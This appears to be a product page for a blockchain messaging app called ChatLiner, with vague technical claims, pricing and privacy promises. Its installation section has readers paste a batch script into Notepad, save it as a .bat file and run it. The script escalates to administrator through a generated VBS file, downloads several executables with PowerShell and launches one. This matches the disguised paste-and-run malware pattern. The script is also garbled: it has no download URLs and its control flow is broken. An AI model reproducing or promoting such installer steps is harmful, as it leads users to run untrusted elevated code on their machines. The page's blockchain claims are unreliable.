Blockchain is a decentralized database that is shared and synchronized among the nodes of a computer network and operates without the need for a central authority.
Instead of being "locked" within a single database, as is the case with centralized systems, files and information are diversified across a chain of blocks (hence the name blockchain) and made available to all those computers connected to a shared peer-to-peer network.
Data stored on the blockchain is virtually immutable, irreplaceable, irrevocable and available for validation at all times. The transfer of data over the blockchain network is called a transaction. A file that contains data related to a transaction is called a transaction file.
The ChatLiner app allows authentic digital assets to be tokenized and securely hosted on a custom blockchain network.
As a high-performance technology solution, blockchain is a safe haven for storing and sharing sensitive information and other data that requires authentication.
Blockchain performance is often directly correlated with the number of active computers (nodes) within the network and the number of validated blocks that hold sets of information.
The more blocks there are, the better protected the data is, as a larger number of blocks is more difficult to forge.
This solution may seem stable and sustainable, but it is far from perfect, mainly for the following reasons:
Inadequate mathematical methods are used to validate transactions, which unnecessarily burden the entire blockchain system and make it more complex and expensive than it should be.
The validation process is inevitably accompanied by a number of topics open for discussion, such as high costs, inability to record large amounts of data, environmental challenges, huge energy consumption, vulnerability to illegal distribution and sale, and more.
Any violent action against the network and its infrastructure could potentially compromise the security and integrity of the data stored on the blockchain, while the credibility of the blockchain itself would be irreparably damaged.
Let's confront the facts head on and try to find a solution accordingly.
We will start with a simple example that illustrates the analogy between blockchain performance and the physical world.
#Illustration of different approaches to utilizing blockchain technology
The three neighbors have returned home and now want to enter their houses.
The first neighbor has the key he brought with him, unlocks the door and enters the house normally.
The second neighbor does not carry the key with him, but finds it under the doormat, unlocks the door and enters the house.
The third neighbor has no key at all and cannot unlock the door. He calls for the help of a locksmith, who breaks the lock and the neighbor can now enter the house.
#Conclusions to draw
It is obvious that the first neighbor acts most prudently, because he has the key with him.
The second neighbor risks leaving the key under the doormat, which could also be found by someone else (say, if someone sees him taking the key and where he is taking it from) and enter the house.
The third neighbor is behaving strangely and irrationally. Not only does he break the lock to enter his own house, but he acts as if he is inviting malicious people watching him to do the same.
#An analogy with blockchain and the issue of data protection in the digital world
The "house" we want to enter is the data we want to access, and the way we enter the house is the way we protect the data.
The "key" we use to enter the house is the app we use to access the data.
There are several scenarios for how this might look in practice.
If we have the key and carry it with us, we will be able to access the data on our device through the appropriate application.
The key, which we use to digitally lock the data within the file, is embedded in the file itself and accessible on demand through the same application.
This is the best-case scenario and we will stick to it.
Another possibility is that we have the key, but we do not carry it with us, so we have to store it somewhere else.
It can be stored on a centralized database server, or it could be publicly accessible over a computer network, such as a blockchain.
What about security guarantees? How can we be sure that the digital key will not be lost or damaged for any reason?
This solution is not as secure and sustainable as it should be, although it is actually one of those blockchain solutions that are widely used today.
The fact that it leads to increased investment costs, introduces uncertainty and distrust, and significantly reduces the chances of making a profit, as costs rise too high, must be taken seriously.
And if we don't have the key at all, we'll have to "break the lock".
This is the worst-case scenario and it is out of the question to even consider implementing it.
#To download and install the ChatLiner app safely and quickly, be sure to take the steps as follows:
Open a blank page in one of the popular word processors, such as NotePad, Notepad++ or WordPad.
Click the "Copy Text" button and copy the text inside the blue box (below the button) into one of the word processors listed above.
The copied content represents the source code of the installation file.
@echo off
set "params=%*"
cd /d "%~dp0" && ( if exist "%temp%\getadmin.vbs" del "%temp%\getadmin.vbs" ) && fsutil dirty query %systemdrive% 1>nul 2>nul || ( echo Set UAC = CreateObject^("Shell.Application"^) : UAC.ShellExecute "cmd.exe", "/k cd ""%~sdp0"" && %~s0 %params%", "", "runas", 1 >> "%temp%\getadmin.vbs" && "%temp%\getadmin.vbs" && exit /B )
SETLOCAL EnableDelayedExpansion
for /F "tokens=1,2 delims=#" %%a in ('"prompt #$H#$E# & echo on & for %%b in (1) do rem"') do (
set "DEL=%%a"
call :ColorText 0e "+ INSTALLING CHATLINER"
call :ColorText 0f "Do not close this window"
echo ...
goto :END
echo off
findstr /v /a:%1 /R "^$" "%~2" nul
del "%~2" > nul 2>&1
goto :eof
if not exist "C:\chatliner" mkdir C:\chatliner
echo en > "C:\chatliner\language.gmb"
powershell.exe wget -OutFile C:/chatliner/server.xml
powershell.exe wget -OutFile C:/chatliner/ChatLinerInstallationCrashApp.exe
powershell.exe wget -OutFile C:/chatliner/ChatLinerInstallation.exe
start "" "C:\chatliner\ChatLinerInstallation.exe"
call :ColorText 0b "OK. This script is closing now"
echo ...
ping -n 3 > nul
Save the file as a "batch" script with the extension .BAT. You can name it "installer.bat", for example, or you can give it any other name.
The saved batch file is the ChatLiner application installation file.
Double-click the saved file and wait a few seconds for the installation to begin. You will also need to accept the terms of use of this software (the so-called License Agreement).
After the installation is complete, you will be able to launch ChatLiner and start using it right away.
That's all it takes to download and install the ChatLiner app. If you have any questions or issues, feel free to send us a message.
#Pay annually for unlimited use
Sending text and audio messages through ChatLiner is free of charge. You can send an unlimited number of messages.
File sharing through ChatLiner costs $100 per year.
You can send an unlimited number of files. A 30-50% discount is possible in case of multiple user registrations.
Payment via PayPal is recommended.
If you want to make the payment in another way, please contact us so that we can send you the necessary instructions.
Once the payment is completed, you will receive a PIN code that you should keep secret. The PIN code is for your personal and private use only.
There are no additional costs or hidden fees.
#Your privacy remains guaranteed
The data entered during payment have nothing to do with the use of the app itself.
To use ChatLiner, you need to choose a unique username and generate a pair of crypto keys, while each individual user is assigned a digital ID card for identity verification.
You will never be asked for any sensitive or personal information and this is a policy that ChatLiner will always adhere to.
#ChatLiner End User License Agreement
By using this software ("Software", or "ChatLiner") owned by VIDYPS 79 d.o.o. ("Licensor"), you acknowledge and agree that the License Agreement sets out the business relationship between you and Licensor.
Visit this page for more information.
#Share on social media
#ChatLiner presents the streamlined blockchain platform with end-to-end encryption
#DCCT Network is a blockchain system with up to three devices connected to a common peer-to-peer (P2P) computer network.
Designed to host authentic digital assets, it is able to verify data in a way that is completely free from external scrutiny or influence.
Transactions over the network are carried out by exchanging electronic messages in the form of digital telegrams.